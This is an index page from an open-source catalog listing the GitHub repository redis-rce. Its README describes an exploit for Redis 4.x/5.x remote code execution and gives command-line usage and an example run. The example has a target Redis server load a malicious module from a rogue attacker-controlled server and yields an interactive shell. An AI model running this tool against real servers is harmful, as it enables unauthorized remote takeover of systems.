Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Ridter/redis-rce
Redis 4.x/5.x RCE
https://github.com/Ridter/redis-rce
Last synced: 22 days ago
JSON representation
Redis 4.x/5.x RCE
- Host: GitHub
- URL: https://github.com/Ridter/redis-rce
- Owner: Ridter
- Created: 2019-07-08T14:05:30.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2021-11-30T14:55:59.000Z (about 3 years ago)
- Last Synced: 2024-08-05T17:44:40.278Z (4 months ago)
- Language: Python
- Size: 14.6 KB
- Stars: 914
- Watchers: 6
- Forks: 220
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - Ridter/redis-rce - Redis 4.x/5.x RCE (Python)
README
# Redis RCE
A exploit for Redis 4.x/5.x RCE, inspired by [Redis post-exploitation](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf).
This repo is a modified version of .
## Usage:
Compile exp.so from .
```
usage: redis-rce.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE]
[-a AUTH] [-v]
Redis 4.x/5.x RCE with RedisModules
optional arguments:
-h, --help show this help message and exit
-r RHOST, --rhost RHOST
target host
-p RPORT, --rport RPORT
target redis port, default 6379
-L LHOST, --lhost LHOST
rogue server ip
-P LPORT, --lport LPORT
rogue server listen port, default 21000
-f FILE, --file FILE RedisModules to load, default exp.so
-a AUTH, --auth AUTH redis password
-v, --verbose show more info
```
## example:
```
python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f exp.so
```
The default target port is 6379 and the default vps port is 21000.
And you will get an interactive shell!